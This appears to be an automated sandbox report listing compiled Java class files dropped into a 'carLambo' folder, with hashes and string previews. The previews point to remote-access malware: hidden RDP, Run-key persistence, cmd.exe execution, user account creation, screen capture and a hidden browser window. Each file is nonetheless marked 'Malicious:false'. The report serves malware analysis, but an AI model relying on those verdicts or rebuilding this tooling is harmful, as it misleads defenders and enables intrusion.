                        Preview:.......4..........................................................................................................................................w.........l....m....u..............v......................#......g.........r..............k.........s....x.........j....t.........g....y....|....}.........o..................................f.. .p.. ....!.h..!.i..!....!....!....".f..".g..".n.."....#.q..#....$....%.~..&....'.{..(.z..)........................................................................................................................................................................................................................................................................................()Ljava/lang/Runtime;...()Ljava/lang/String;...()Ljava/net/URI;...()Ljava/net/URL;...()Ljava/security/CodeSource;.."()Ljava/security/ProtectionDomain;...()V...()Z...()[Ljava/lang/String;...(I)V...(II)Ljava/lang/String;...(J)V...(Ljava/io/File;Ljava/io/File;)V...(Ljava/lang/String;)I..)(Lja

                        C:\jar\carLambo\GeLuFwhdbiiEVoEeoUbtXxPX.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):5778
                        Entropy (8bit):5.978892450138961
                        Encrypted:false
                        SSDEEP:96:XywD/uOuPTBqGySGVH6ZatzH/t6M/ojPBZ4BbqVH6Zatz8q/y:XymmOuPTwGCa8FH/t6oojPUAa8FH/y
                        MD5:6276A7223044C7DFB01F247B06B99ECA
                        SHA1:603A3BD207F7FA45FC14145AA673F78CACAE960A
                        SHA-256:0F963C9FF5015F805AFF6CB510711A5D2FD4737BA161EBF08ABBC99F967C8B17
                        SHA-512:E9BF6575B3CD1338513F6809753ABDE53AFFBC9B4C2241F828CFABE1DBEFA9FDC345A8C853BA6B254F3485CBA7A406D7EFB8F94A007789BFB95C1C0CD6FBBAE1
                        Malicious:false
                        Preview:.......4...D...............................................................................................................................r..............g........................b....e....l....u....z....{....|....~.........c....k.........e....k..............p............ .a..!....".a..#.o..#.x..$.f..$.m..$.n..$.s..$.y..$.}..$....$....$....%.a..%.e..%.h..%.i..%.j..%....&.w..'.d..'....(.k..(.t..(.v..).e..).q..................................................................................................................................................................................................................................................... KB....."...#,###.00...%%...()I...()J...()Ljava/io/InputStream;...()Ljava/io/OutputStream;...()Ljava/lang/Runtime;...()Ljava/lang/String;...()V...()Z...()[B...()[Ljava/io/File;...(D)Ljava/lang/String;...(I)Ljava/lang/String;...(I)Ljava/lang/StringBuilder;...(II)Ljava/lang/String;...(J)Ljava/lang/StringBuilder;..&(LcarLambo/GeLuFwhdbiiEVoEeoUbt

                        C:\jar\carLambo\HBrowserNativeApis.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):4725
                        Entropy (8bit):5.641819388945017
                        Encrypted:false
                        SSDEEP:48:0+NzlnfCvKCvvCvvCvGCvlCvXCvmCvECvcCviCv+ICv0BCviCv0sY36CvaCviCvU:zF1hh1/HPuHp98KFW3WmV8IZp
                        MD5:DE53C45EF1C763D42F69C48C072D49AC
                        SHA1:53D1BCDADA3047C8C2E35032E17B411C3854A5AE
                        SHA-256:C2E5EB5EB758AE93BDAF240985773F1A9FB54B290CA3C53700454D0720464486
                        SHA-512:FDA01DAC7ECF0B30EF8C1428C6E73649A2DEC8847AEFDD16AF132A5463F2F02CACA93463D88D1D5C50DEAA9FADA1FB7DB8C8F402DB52D9C66F676600196BA33A
                        Malicious:false
                        Preview:.......4................................................C....O....U....D....I....8....H....3....S....Q....3....P....T....4....@....B....R....5....6....7....9....:....?....J....;....<....=....>....A....E....F....G....K....L....M....N..r.W..s.]..u.\..v.Z..w._..x....y.[..z.k..{.l..|.p..}.i..~.a....^....a....i....j..............e....g....f..............`....d....c....h....b.........o....V....X....m....q........()Ljava/lang/String;...()V...(BBII)V...(Lcom/sun/jna/platform/win32/WinDef$HBITMAP;)Z..P(Lcom/sun/jna/platform/win32/WinDef$HDC;)Lcom/sun/jna/platform/win32/WinDef$HDC;..*(Lcom/sun/jna/platform/win32/WinDef$HDC;)Z..V(Lcom/sun/jna/platform/win32/WinDef$HDC;II)Lcom/sun/jna/platform/win32/WinDef$HBITMAP;...(Lcom/sun/jna/platform/win32/WinDef$HDC;IIIILcom/sun/jna/platform/win32/WinDef$HDC;IILcom/sun/jna/platform/win32/WinDef$DWORD;)Z...(Lcom/sun/jna/platform/win32/WinDef$HDC;Lcom/sun/jna/platform/win32/WinDef$HBITMAP;IILcom/sun/jna/Pointer;Lcom/sun/jna/platform/win32/WinGDI$BITMAPINFO;I)

                        C:\jar\carLambo\HRvrZvbQXOxdQCpuCvMoA.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1494
                        Entropy (8bit):5.7699615403562365
                        Encrypted:false
                        SSDEEP:24:kitlX3rUjvsyCvG1yEoOQ2CJqNM5AtqtikaJvg+Xyl:kiLX7UjvsyCu1FQ2AqNM5xa1g+Cl
                        MD5:F87072AB9D6E400199D0EEDCFDDCD0AF
                        SHA1:3BF4D151E2EDD2EBE72D9B24307389BBEDF49F29
                        SHA-256:FA77E43538637ED3025C94D75E6B92C7711B92C169852D847A21A0607D3834BC
                        SHA-512:50ECF6A766867D30F2D34B0CF51F09AC0ABE53D1A7738E2530D44B783DA9FB708DC58C4C1501D720ADF312ABA216F694B6740961E5EE646024202BB42196159E
                        Malicious:false
                        Preview:.......4.b..4..5..B..D..H..L..X..a..I..K..P..Q..R..S..T..U..V..W....*....&....-....,....%....$....+....'.........0....)..../....1....3....$....(....2..C.9..C.:..C.;..C.A..J.=..M.<..N.F..O.6..Y.9..Z.8..[.@..\.?..].7..^.>.._.8..`.8...........()Ljava/io/InputStream;...()Ljava/lang/Process;...()Ljava/lang/String;...()V...(Ljava/io/InputStream;)V...(Ljava/io/Reader;)V...(Ljava/lang/Object;)Z..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)Z..'(Ljava/lang/String;)[Ljava/lang/String;...(Z)Ljava/lang/ProcessBuilder;...([Ljava/lang/String;)V.../c...<init>...=...Code...Ljava/lang/String;...StackMapTable...VolumeSerialNumber...[Ljava/lang/String;...append...carLambo/HRvrZvbQXOxdQCpuCvMoA...cmd.exe...equals...gQEuyVcYntwPXTysEtfquh...getInputStream...java/io/BufferedReader...java/io/IOException...java/io/InputStreamReader...java/lang/Object...java/lang/Process...java/lang/ProcessBuilder...java/lang/String...java/lang/StringBuilder...null...printStackTrace...readLine...redirec

                        C:\jar\carLambo\INziJWwhFRZYUTzXNlVz.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1112
                        Entropy (8bit):5.803264203787311
                        Encrypted:false
                        SSDEEP:24:RK6ERApSCvWL9aCvW63y1fDnCvWF1SgK7xACvWxCvWmQCz5UEN5Vxk9c/:KESCvg9aCvxACvQ19K7xACvgCvWmQCzP
                        MD5:7A12A2C338CCA99D8D61057ADD1B95DC
                        SHA1:495391FE279F0C3FBFBEEBF12F10839D8243077F
                        SHA-256:F9AF7C59C95B8264FDEFA78737C0652A768D4E076D201FFF2A3C43EEDF5BE9AD
                        SHA-512:E650A3D348667F189B9EBA86E34B5242AB0A943917363336697AC0FC56E3BF7830C89D832E09292B374AF4632BD4CF1988968CD319900873531092E4FD315048
                        Malicious:false
                        Preview:.......4.=...../..0..1..2..3..4..8..9....................................................%....5.#..6."..6.'..6.(..7....:.*..:.+..;.)..<.$...()V...()Z..-(LcarLambo/RestoreWindow;Ljava/lang/String;)V..@(Lcom/sun/jna/platform/win32/WinDef$HWND;Lcom/sun/jna/Pointer;)Z...(Lcom/sun/jna/platform/win32/WinDef$HWND;[BI)I...(Ljava/lang/CharSequence;)Z...([B)Ljava/lang/String;...<init>...Code...I...LcarLambo/HBrowserNativeApis;...LcarLambo/RestoreWindow;..(Lcom/sun/jna/platform/win32/WinDef$HWND;...Ljava/lang/String;...StackMapTable...callback...carLambo/HBrowserNativeApis...carLambo/INziJWwhFRZYUTzXNlVz...carLambo/RestoreWindow...com/sun/jna/Native...com/sun/jna/Pointer..&com/sun/jna/platform/win32/WinDef$HWND...com/sun/jna/platform/win32/WinUser$WNDENUMPROC...contains...gQEuyVcYntwPXTysEtfquh...isEmpty...java/lang/Object...java/lang/String...nnHRYoAONroTDXAkGOnAtRE...qvNsplybcQmnatGjnQTThBZ...toString.0.............6.'.....:.+.....;.).......%. ...&... ........*+...*,...*...*............-.!...&.

                        C:\jar\carLambo\ISyzDWggemUZimyTYMwRRfQ.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):9091
                        Entropy (8bit):6.0640873642400415
                        Encrypted:false
                        SSDEEP:192:QUK63+wh+25483dxtMgarANL2PFX++/0w+OK0ogy0JVHrrzZTSZV0Jv:Q+48txtMrrI2PQa0wBvoqJVLrTJv
                        MD5:4232BB01ED6F761EF18D1360F3331181
                        SHA1:F7CAF441F309AD89A1B787F736380F0610F622F2
                        SHA-256:CBE99E10CE8BA786BF6E11A393F1786DBF4B8E1E2BF7E7FAF1B93313E5CC4880
                        SHA-512:0FA9CA3CEFCE07B4CD6C6F4EB92AA8FAEF426F3A07EDF7812131C7E3B8897817DA187C75D41165EBBFB1248716676120D13A17CE998DB13EC1DC989B8088329B
                        Malicious:false
                        Preview:.......4.............?..@..A..B..C..D..E..H..K..L..S..]..^..b..g..h..l..v....................f..m..n..o..p..q..r..s..t..w..x.....................................................................................................#....#....#....#....#....#....#....#....#....#....#....#....#....#....#....#....&....(....(....,....:....?..................................................................... .... ....!...."....$....%....'....)....*....*....+....+....+....,....,....,....,....-....-....-.................../..../..../....0....0....1....1....1....1....2....3....4....4....5....7....7....7....8....8....8....8....8....8....8....8....8....8....8....8....9....9....9....9....9....:....;....;....;....<....<....<....<....<....=....=....>....@....@....A....&....&....F....F.%..F.&..F.*..F.2..F.4..F.<..I....M.Y..N.Y..O....P.$..R.U..`....`.e..a.\..d.Z..i.Q..j....j./..u....y.3..z.)..{.-..{.>..|....}....~....~.5..~.Y....Y...................1.......................................2....Q....+.......

                        C:\jar\carLambo\JMrXOwDACcclgsrbfAOpFrHXlamCDQ.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):393
                        Entropy (8bit):5.457670755253947
                        Encrypted:false
                        SSDEEP:12:FbCoy12+q9WuJSrqqFnxaJtRl9/LqkM50:Fbhy15qBSzQHz9bM50
                        MD5:7F7957B5C353A805D2FA6DC0B7A18778
                        SHA1:29CEDCC5D10D338292878F447A3179E04845B625
                        SHA-256:84F45DC097AD9E82B8EC15BCFB92012C81586DB79B858DA9762DCFAC624FAEA2
                        SHA-512:1EB62AD2C20D51DA46F3AB341BF5C051D3DDA76A36FB6218DFA53C6948860941A8A5EC9B209B2DDF9DA29F7D564025C3A11157824DE2BAF5E3BFD7AC8A335EB4
                        Malicious:false
                        Preview:.......4...............................................()V..%(LcarLambo/lXFRxTmUHAVtXyFTZbpbiXx;)V...<init>...Code.."LcarLambo/lXFRxTmUHAVtXyFTZbpbiXx;..'carLambo/JMrXOwDACcclgsrbfAOpFrHXlamCDQ.. carLambo/lXFRxTmUHAVtXyFTZbpbiXx...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...run.0..........................................*+...*..............................*.............

                        C:\jar\carLambo\Kernel32.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):240
                        Entropy (8bit):5.275971282267533
                        Encrypted:false
                        SSDEEP:6:+liUwCvUB2JjGaS+Xz8XfpEf2UwCjvRPYklQe2:+PwCvK2JSaS+Xz8XfE9wCjvRj2
                        MD5:629406C3A190F005DB7C4910CB4B4985
                        SHA1:EB09EA68C77AA2201AA28ABF9D559C601B6E2478
                        SHA-256:EDC583512463B1F42CA8D7F1702DE9CDC8505BF856BEDDFF2BBBF2EB2640632D
                        SHA-512:63AA683932108298B466EC7AF9E6CAB66B6CB9302186DE07578609BCB0D00B503E242BEDDD18458A8F262B5B0E6E4DCA6F0CBEC4E92842648CE718B27BAD9147
                        Malicious:false
                        Preview:.......4.............,(Lcom/sun/jna/platform/win32/WinNT$HANDLE;)Z...Wow64DisableWow64FsRedirection...Wow64RevertWow64FsRedirection...carLambo/Kernel32..#com/sun/jna/platform/win32/Kernel32...java/lang/Object................................

                        C:\jar\carLambo\LZFZUTettLTuEIERFOckFPlpH.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1945
                        Entropy (8bit):5.860763009318161
                        Encrypted:false
                        SSDEEP:24:OarcJ32b2RYSFyQy1cAEoWMVEGKZSpYwbptHTVQYohzT5DVGMgLC0+gtFZk5LWIK:8x2bsaEHMZKspdTTVQTzT5DVY+EKx1wx
                        MD5:BE9D39C334B0009681FBFC4A2512E495
                        SHA1:B5D4A968FEE2C676F5DD20E1CC60B8B553FE2933
                        SHA-256:84C294E0B35CC564EAD58DD077A12EAD0BCD3A0F584BC44E3413EF69BDB94AD6
                        SHA-512:4624D9864433951649A927F5A258C40FB263C7226DF7CC52AA05A74370299A70F2A98C312E2BBB46639FA2475E0B3B9B21C5619185A9D3C7A450774CB97034C6
                        Malicious:false
                        Preview:.......4..............I..W..^..c..p..z..d..e..f..g..h..i..j..k..q..r..s..t..u..v..w..x..y.............>....7....E....D....6....8....;....<....=....B....5....:....?....C....C....4....A....G....4....5....9....H....@....F..X.K..X.V..Z.K..].`..a.K..b.U..l.L..m.O..m.P..m.R..m.[..n.J..o.T..{.S..|.M..}.K..~.J....\....Q....N....J..."...()Ljava/lang/String;...()V...()Z...(I)Ljava/lang/String;...(II)Ljava/lang/String;..:(ILjava/lang/String;Ljava/lang/String;I)Ljava/lang/String;..;(ILjava/lang/String;Ljava/lang/String;Ljava/lang/String;I)V...(J)V...(Ljava/io/File;Ljava/io/File;)V...(Ljava/lang/String;)I..&(Ljava/lang/String;)Ljava/lang/String;..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)V.......<init>...Code...GYDTPVEwzYqRTvxmvHtRLJG...I...Ljava/lang/String;...QsNkSlGCqFomtjHlHdgKKJlOETn..-Software\Microsoft\Windows\CurrentVersion\Run...StackMapTable...Z...akllnBiTjwPmAwfMbajsTFm...append...bin...carLambo/FirstRun.. carLambo/ISyzDWggemUZimyTYMwRRfQ.."carLambo/LZFZUTettLT

                        C:\jar\carLambo\LbNkQuXbxAPhtiNOmAjuW.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):2350
                        Entropy (8bit):5.750026922291392
                        Encrypted:false
                        SSDEEP:48:8I7rrRoxV7Bdnf2MGXw6QZ3wZFs+k3iJ4RXxDRNnQGlLvjp1tfEHmzTzA3UDJqHG:pyv9dnOxA1Z3wbkyJ2XVnhVs2zA3UD8m
                        MD5:A027DBF130695F3D0AFDF154359A33CC
                        SHA1:0CFDDFBBF9EC43490BE88091F2D5BF0C69AEDB1E
                        SHA-256:164ED5D49B9900E96EFC01DB31A48D4C7F00C25B4EFFE8FEF1AC22C5EF4B163E
                        SHA-512:470DBF543C33C84B1FC38069EE788D797DDBDCF193AFD62FB40FA0267E5D7BF02609A13A863F32E4437FAEED6112896E12660E04E7744718BA43DE5AD1F68638
                        Malicious:false
                        Preview:.......4....{...............................................................................................~.....!.E..!.F..!.G..!.H..!.I..!.J..!.K..!.L..!.M..!.N..!.O..!.P..!.Q..!.R..!.S..!.T..!.U..!.V..!.W..!.X..!.Y..!.Z..!.[..!.\..!.]..!.^..!._..!.`..!.a..!.b..!.c..!.d..".D..g.e..h.r..i.r..j.r..k.r..m.r..n.r..o.r..p.r..s.r..t.r..u.r..v.r..w.r..x.r..y.r..z.r..|.r..}.r....r....r....r....r....r....r....r....r....r....r....r....r....r....r...()V...<clinit>...<init>...AimdQBqtwmRlTmfOwmvjwNywPJZsM...CHHXGzeSpzwiJOAtZoSZBJ...CHHXGzeSpzwiJOAtZoSZBJOdYDRcQU...CMGnAzOSNTsjXgAokPsrvtqOAexQi...Code...GYDTPVEwzYqRTvxmvHtRLJG...GeLuFwhdbiiEVoEeoUbtXxPX...HRvrZvbQXOxdQCpuCvMoA...ISyzDWggemUZimyTYMwRRfQ...LZFZUTettLTuEIERFOckFPlpH...Ljava/lang/String;...OeziLNfIzXyeUUtuiOSPKlGvibRk...PWjvaMJuUYJDdBdFIQec...QsNkSlGCqFomtjHlHdgKKJlOETn...SjomlJrGISDYNqiAAulMONOv...TQaTMIBufeXwulTTDuvpxBTBfNW...TgBoQLFFtKbHGgBZrVBiDrm...YEJPIdRNPZsBIbCpFLfaCVN...akllnBiTjwPmAwfMbajsTFm...all-pass...bQOGTazZDTmWsQIjxo

                        C:\jar\carLambo\MMpWpSYgqriSzVphTpNfhnTglQdmfQ.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):411
                        Entropy (8bit):5.53599982011939
                        Encrypted:false
                        SSDEEP:6:Fb2U3jsAfanRViyEy4y15xfanRViyAqZyqkz7ZfanRViyJQnxaJ2qRPt+NclVXiw:FbzyEhy1zyAqGhyJQnxaJtRl9/LqkM50
                        MD5:B1666AA954F8D6D86D5E48F587C92E15
                        SHA1:9FB8FC155332C4A475AA41F955EBDE12010E9186
                        SHA-256:AD08BA96288E69752F6487014AD05E7BF9518E92FF1B087C4E0933E604B65BB1
                        SHA-512:F2E78E36748F2A980ABC89EB24F861E633186F4BBEAD8AFB7EF983EB69102DCCCF99901472AA0134F5F82C706D791D447614E2651FB143105A28C90BCE19BD72
                        Malicious:false
                        Preview:.......4...............................................()V..+(LcarLambo/XfrcwHiEekkBljrjyatNOjRICOGWh;)V...<init>...Code..(LcarLambo/XfrcwHiEekkBljrjyatNOjRICOGWh;..'carLambo/MMpWpSYgqriSzVphTpNfhnTglQdmfQ..&carLambo/XfrcwHiEekkBljrjyatNOjRICOGWh...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...run.0..........................................*+...*..............................*.............

                        C:\jar\carLambo\OeziLNfIzXyeUUtuiOSPKlGvibRk.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):487
                        Entropy (8bit):5.652598149535544
                        Encrypted:false
                        SSDEEP:12:gMHYMjQBjs/MJy1aLjoj31FnxaJtRlMAMiGMZ:gMH5GDy1S0LQHzH7GW
                        MD5:596961025A3960FBDE01A503B7E17FB1
                        SHA1:FB8C93756247198612A6BC906E327B50F057D318
                        SHA-256:97593741B627DE53F0AFB35FD1E9CF40C7212A2FC1DE13BACEA330CFF58DB102
                        SHA-512:E50E190CB73967356A6F7B4AD9E7928ECCBB88FE2E43BF2A23F0061EC1F1ACDECEB14EDCB74CEDF801C776DA1E958A7197A25BFA88CB480C95E3F87F6879829F
                        Malicious:false
                        Preview:.......4............................................................()V..$(LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;)V..6(LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;Ljava/lang/String;)V...<init>...Code...Initializing HRDP..!LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;...carLambo/CHHXGzeSpzwiJOAtZoSZBJ..%carLambo/OeziLNfIzXyeUUtuiOSPKlGvibRk...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...run.0..........................................*+...*..............................*........*.............

                        C:\jar\carLambo\PWjvaMJuUYJDdBdFIQec.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):6418
                        Entropy (8bit):6.0848527629034255
                        Encrypted:false
                        SSDEEP:96:JU7B5SVg0NUqzGFOb8V37d+e4RFLmdmFCQOFVko3ghaLTwqcskiMd4:/Vg0LyG+5KLCmFNO/gWTXcskiC4
                        MD5:6655492D2107A409D5F5FC25CC0BA27E
                        SHA1:613FBF72F76DE4BACA8C304BDCBADEDA5DD74096
                        SHA-256:B86B5B24B3739EA5F16F574C4C37AD23E83698AD58219D2E92A47AF15BAD1AF4
                        SHA-512:DEDBC394F82E331F61BA62D17E29DA9718CF2888B1C7AF190D20CAA7259E314085705DBBF5838D72327CE8029EDBBE2BF258DBAFA7DD3FDFC85324B0279289F0
                        Malicious:false
                        Preview:.......4.C.... .........................................................................................&..-..5..:..;..?..@..A................................................................. ..!.."..#..$..%..)....)....)....-....-....-....-....0....2....@....*....,....,....,....,....,....,........./....1....1....1....2....2....2....2....2....2....2....2....3....4....6....6....7....8....8....9....;....<....=....=....=....>....>....>....>....>....>....>....>....>....>....>....?....?....?....?....A....A....+....+..........................................................................................................................................................'....(....)....*....+........./....0....0....0....1....2....3....4....6....7....8....9....9....<....=....>....B............. ... /add... /delete..."..." -i -o..." -u...'" delete...()I...()Ljava/io/InputStream;...()Ljava/lang/Process;...()Ljava/lang/String;...()V...()Z...()[Ljava/lang/String;...(I)I...(I)Ljava/lang/String;...(II)L

                        C:\jar\carLambo\QsNkSlGCqFomtjHlHdgKKJlOETn.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):402
                        Entropy (8bit):5.599259175644478
                        Encrypted:false
                        SSDEEP:6:Fb2U3jsU1Q32bH4y1XT11Q32esUj/JGG1Q32wnxaJ2qRPt+NclVXi8BPmlknM50:FbfdbYy1bdPo4idwnxaJtRl9/LqkM50
                        MD5:0616D48F334A64092B2B8B3F731A64FD
                        SHA1:263F2BD831C9834C50F496A2304D2F779C5BACF9
                        SHA-256:8633A2E9F0A76161BFB9EBFABD503450A061C2E4D1008B6387EE3EF1C7504FD6
                        SHA-512:50E99136AA6BCEF0739214BD42BD80202F23764E4EA737EBF141E028360DB75B34FF1F07846C1500A7C33A41DF679C597EDB4953922181D7A07A01C10DAFEA47
                        Malicious:false
                        Preview:.......4...............................................()V..)(LcarLambo/pOkXJMhVItPChYeMRCPBQRAUzLx;)V...<init>...Code..&LcarLambo/pOkXJMhVItPChYeMRCPBQRAUzLx;..$carLambo/QsNkSlGCqFomtjHlHdgKKJlOETn..$carLambo/pOkXJMhVItPChYeMRCPBQRAUzLx...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...run.0..........................................*+...*..............................*.............

                        C:\jar\carLambo\RGguaORgBxwLQFguOTfsyvWLb.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):414
                        Entropy (8bit):5.518758942373546
                        Encrypted:false
                        SSDEEP:12:svUI2Moy12yYIhqqFnxaJtRloT/YuPkM50:SUI2Hy1JFxQHzoTAFM50
                        MD5:A0F599BF5B7B34EA839C35302CADE708
                        SHA1:F4E38FDBFB4633AED9D950472B515F6F9BF90ADF
                        SHA-256:7C13E0515A3E74484FA032E1D2DEBDD0B13039B748DF1A05E45F68F7220DE783
                        SHA-512:C2B7DF954098270CA838B8B6A80A39153713A60B77ED1C6F9AB00DAD882F88F81D328F20C7EC7408BE649F0D69876A65E7F07DE22D35201B1DC2FAC37E221997
                        Malicious:false
                        Preview:.......4...............................................()V..%(LcarLambo/lXFRxTmUHAVtXyFTZbpbiXx;)V...<init>...Code.."LcarLambo/lXFRxTmUHAVtXyFTZbpbiXx;.."carLambo/RGguaORgBxwLQFguOTfsyvWLb.. carLambo/lXFRxTmUHAVtXyFTZbpbiXx...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...nnHRYoAONroTDXAkGOnAtRE...run.0..........................................*+...*..............................*.............

                        C:\jar\carLambo\RestoreWindow.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1781
                        Entropy (8bit):5.887160291644172
                        Encrypted:false
                        SSDEEP:48:2gzDqo6oz9wCvYCvbzCvgCvzCvWq9hUXKCvewACvgaV6QiVMFV3/XDgEj1:NDPf9gYQXDp5
                        MD5:B8ADD848609F10EE28E961C11F721FDE
                        SHA1:F0C12B5AE915181847CFBFBAC524228F3DC5631E
                        SHA-256:BF2369EB64AFA4D0A1973D76F608AB5B6498F86131297AAC615B5771F72C585F
                        SHA-512:32F71594A9834FE01FDED7A2753A7306E99E2A3167CB7E30E8A82EE13082CC1A68DBB60362CC39AB132F382799760B8FBC325A2F71EDF63F23F0B01F34F91951
                        Malicious:false
                        Preview:.......4.e..D..E..F..G..I..N..P..W..Q..R..S..T..U..Y..Z..[..\..]..^.............2....3....4....(....-........./....0....)....(....1....,....*....5....(....+....7....6..H.9..H.<..H.=..H.C..V.:..X.>..X.?..X.@..X.A..X.B..X.K..`.L..a.M..b.B..c.;..d.8...()Ljava/lang/Process;...()V...(I)Lcom/sun/jna/Pointer;...(J)V..-(LcarLambo/RestoreWindow;Ljava/lang/String;)V...(Lcom/sun/jna/Pointer;)V..,(Lcom/sun/jna/platform/win32/WinDef$HWND;I)Z..-(Lcom/sun/jna/platform/win32/WinDef$HWND;II)I..X(Lcom/sun/jna/platform/win32/WinDef$HWND;Lcom/sun/jna/platform/win32/WinDef$HWND;IIIII)Z..H(Lcom/sun/jna/platform/win32/WinUser$WNDENUMPROC;Lcom/sun/jna/Pointer;)Z...(Ljava/lang/String;)V...([Ljava/lang/String;)V...--disable-audio...--mute-audio...--new-window...--window-position=1280,720...<init>..5C:\Program Files\Google\Chrome\Application\chrome.exe...Code...LcarLambo/HBrowserNativeApis;..(Lcom/sun/jna/platform/win32/WinDef$HWND;...Ljava/io/PrintStream;...Restored...StackMapTable...Strigoi Browser...carLambo/

                        C:\jar\carLambo\SjomlJrGISDYNqiAAulMONOv.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):124
                        Entropy (8bit):5.217588851004168
                        Encrypted:false
                        SSDEEP:3:DbllEFlY8NVmQPFPi6/cOnQl9xUDJC1qQCK8P5GxgGn:8rrP9AOnQnxaJ2qRP5VG
                        MD5:87CD6EE81D513F43AB8DC52EAE1181F4
                        SHA1:90AF51C60729F29EC295A776F81AC82729933E51
                        SHA-256:EC9E3DC65978F375EC7DFACEF3E86AF504BC07E82B5FB9E370F75F684CBEFEBF
                        SHA-512:1170602BCD531C975CCED9AB22FA2CD0612782E68D1F1A41F3DA45E4F781EAFD8E7D1EA6452899524E04C1B231B896F81427C0DB855FAA87B17F32E7E803CEE5
                        Malicious:false
                        Preview:.......4...........()V..!carLambo/SjomlJrGISDYNqiAAulMONOv...gQEuyVcYntwPXTysEtfquh...java/lang/Object......................

                        C:\jar\carLambo\TQaTMIBufeXwulTTDuvpxBTBfNW.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):3902
                        Entropy (8bit):5.91301457892101
                        Encrypted:false
                        SSDEEP:96:3RweI6Urn0rlUnoA9K1p8WXN6HBu8E1reciKL:3RXUT0rl8Gr0h9E1SE
                        MD5:2CB7EC37D42AF36D1D8C4F0007F6CF93
                        SHA1:3D7BCB35B26E971798DD46A653DD3247993296C3
                        SHA-256:94E5E63367D0187C20C6AA9F19F1FB1FA48BF11FAD9E74E779C470B6690192B4
                        SHA-512:27481425784BB459A211F7D70E5FFD2E320D0E3553C2FA3194B6E7DD813FEEFF5B0936F85E2AFC2E64BD75CCBED7DF280834F982DB9AFEFCD4AC64239F92E220
                        Malicious:false
                        Preview:.......4.........................................................................................................Z....c....f....O....N....V....Y....W....X....e....N....T....]....L....R....g....L....]....K....h....j....K....Q....k....^....K....\....a.. .N..!.M..!.R..!.S..!.U..!.d..!.l...._....b....P....[....`....i....r....u....x....~.........z....|....r....r....s....r....q....v....w..............t....}....o....{....s....p.........n..............o..............y....m.........o........()I...()Ljava/lang/Object;...()Ljava/lang/String;...()Ljava/util/Iterator;...()Ljava/util/List;...()V...()Z...(I)Ljava/lang/Object;...(Ljava/io/File;)V..>(Ljava/io/File;Ljava/io/File;Ljava/io/File;)Ljava/lang/String;..;(Ljava/io/FileInputStream;Ljava/util/zip/ZipOutputStream;)V...(Ljava/io/OutputStream;)V..D(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;...(Ljava/lang/Object;)Z..&(Ljava/lang/String;)Ljava/lang/String;..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)

                        C:\jar\carLambo\TgBoQLFFtKbHGgBZrVBiDrm.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):317
                        Entropy (8bit):5.465614600175668
                        Encrypted:false
                        SSDEEP:6:kPjxLssW4y1XTaxAUlYXMO8EDyAPXUnxaJ2qRP53zXMsUXVlk/Ov0lqoqDVX:esYy1DUIMO9vvUnxaJtRF7MsUXVlV0sT
                        MD5:BC1336A2A8F98BCB0D599C8026363E1E
                        SHA1:780C34F33FFE9BFA75EA7F8489DB561A6B5926C1
                        SHA-256:112387821BA39051BED56EC710732D2021C551ADFF61FC6CF6F820F0A47520AF
                        SHA-512:93E7BFB3DEB29924DF157A8AD0BD3F61648CD453E14DD419A2CFB4DF03375AAFEC3B5F3E987FC1FCE7DE15356A6AEE2A674A2C5B32605E55C9F30A40C4031244
                        Malicious:false
